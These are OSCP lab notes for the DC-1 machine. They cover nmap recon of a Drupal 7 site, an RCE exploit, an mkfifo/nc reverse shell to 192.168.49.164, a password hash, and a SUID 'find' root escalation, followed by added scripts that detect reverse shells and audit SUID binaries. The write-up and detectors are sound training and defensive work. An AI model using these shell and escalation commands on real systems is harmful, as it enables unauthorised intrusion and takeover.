OSCP Notes

DC-1

22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37701/tcp status
| 100024 1 39759/udp6 status
| 100024 1 45295/tcp6 status
|_ 100024 1 55275/udp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Running nikto reveals that the site is running Drupal 7 (the http-generator header in the nmap output shows the same).
This means that it is most likely vulnerable to RCE.
The script tries to execute the "id" command by default, and running it shows that the command succeeded. Now we have RCE.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.164 4545 >/tmp/f
The reverse shell command worked. (Make sure to wrap the command in double quotes, or you'll receive a reverse shell from your own machine.)
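The named-pipe reverse shell above has a recognisable shape on the victim side: one process command line that creates a FIFO, starts an interactive shell and pipes it into a network client. The following is an added example for the defender's side, not code from the original notes; it assumes process command lines are fed one per line (for instance from `ps -eo args --no-headers` or from execve records in audit logs), and the sample lines are constructed.

```shell
#!/bin/sh
# Added example (not from the original notes): flag process command lines that
# combine a named pipe, an interactive shell and nc/ncat, which is the shape of
# the mkfifo reverse shell used above. Input is one command line per line.

# Constructed sample: three benign lines and one line matching the pattern.
SAMPLE_PROCS='/usr/sbin/apache2 -k start
nc -l -p 8080
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.164 4545 >/tmp/f
sshd: www-data [priv]'

# Print every line that references mkfifo, an interactive sh/bash and nc/ncat.
# A lone "nc -l" listener is not flagged on its own; all three parts must appear.
flag_fifo_shells() {
    grep -E 'mkfifo' | grep -E '/bin/(ba)?sh -i' | grep -E '(^|[|; ])n(c|cat) '
}

# Example run over the constructed sample (prints only the reverse shell line).
# On a live host: ps -eo args --no-headers | flag_fifo_shells
printf '%s\n' "$SAMPLE_PROCS" | flag_fifo_shells
```

The three-stage filter is deliberately strict so that ordinary use of nc or mkfifo on its own does not fire; a hit on a web server account such as www-data is the case worth alerting on, since that is the account the Drupal RCE above runs as.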

Priv Esc

R0ck3t
$S$DAK00p3Dkojkf4O/UizYxenguXnjv
Found the SUID binary find.
Ran the command from GTFOBins and we are root! https://gtfobins.github.io/gtfobins/find/
find . -exec "/bin/bash" -p \;
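The root shell above exists only because find carries the setuid bit. The following is an added hardening check, not code from the original notes or from GTFOBins: it enumerates setuid-root files and flags the ones whose basename is a program known to hand out a shell. The list of names is an assumption (find is the one abused on this box; the others are common GTFOBins entries), and the sample paths are constructed.

```shell
#!/bin/sh
# Added example (not from the original notes): audit setuid binaries and flag
# those whose basename is a program that can spawn a shell. find is the binary
# abused on DC-1; the other names are an assumed starting list for a reviewer.

# Programs that should not normally carry the setuid bit (assumed list).
RISKY_SUID_NAMES="find bash sh vim vi nano python python3 perl awk nmap less more"

# Read one path per line on stdin; print the paths whose basename is risky.
flag_risky_suid() {
    while IFS= read -r path; do
        name=$(basename "$path")
        for risky in $RISKY_SUID_NAMES; do
            if [ "$name" = "$risky" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Enumerate setuid-root regular files on the running host.
list_suid_root() {
    find / -xdev -type f -perm -4000 -user root 2>/dev/null
}

# Constructed sample standing in for the output of list_suid_root.
SAMPLE_SUID='/usr/bin/find
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/nmap'

# Example run over the constructed sample (prints find and nmap).
# On a live host:  list_suid_root | flag_risky_suid
# Remediation for anything flagged that has no business being setuid:
#   chmod u-s /path/to/binary
printf '%s\n' "$SAMPLE_SUID" | flag_risky_suid
```

passwd and sudo are expected to be setuid and are left alone; the point of the name list is to separate binaries that need the bit from ones that only become a privilege escalation path when they carry it.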